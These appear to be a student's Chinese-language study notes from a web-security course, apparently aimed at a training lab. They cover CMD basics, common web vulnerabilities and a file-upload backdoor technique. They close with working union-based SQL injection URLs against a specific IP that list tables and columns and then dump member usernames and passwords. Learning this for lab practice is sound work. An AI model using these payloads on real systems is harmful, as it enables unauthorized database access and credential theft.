技巧
CMD技巧
- nslookup解析网站
- hostname 主机名
- ping 解析网站连接状态
认识IP
ISO七层
TCP/IP协议(一)网络基础知识 网络七层协议
11天
web漏洞
sql注入漏洞。
通过sql获取用户名和密码,从而读取到后台数据
目录遍历漏洞
通过目录扫描工具获取到目录的结构,然后通过一级一级的访问(. .\)获取到目录
文件读取漏洞
可以获取源码
文件上传漏洞
可以bs抓包,修改文件的后缀名,然后植入后门,进行数据读取。
十二天
1、下载安装忍者系统
2、认识sql注入
3、sql注入代码
4、注入情况
5、使用工具注入的时候可以在注入值的后面加入*号
6、order by查询sql的列数,猜到不正常为止。
version()
database()
user()
@@version_compile_os
数据库5.0属于高版本
5.0以上自带一个informmation_schema的数据库,存储了所有数据库名 表名 列名 列名的数据库
table_schema数据库名
7、查询表名
http://124.70.22.208:45545/new_list.php?id=-1%20union%20select%201,table_name,3,4%20from%20information_schema.tables%20where%20table_schema=%22mozhe_Discuz_StormGroup%22
查列名
http://124.70.22.208:45810/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%22StormGroup_member%22
最好查询所有的 group_concat
http://124.70.22.208:45810/new_list.php?id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member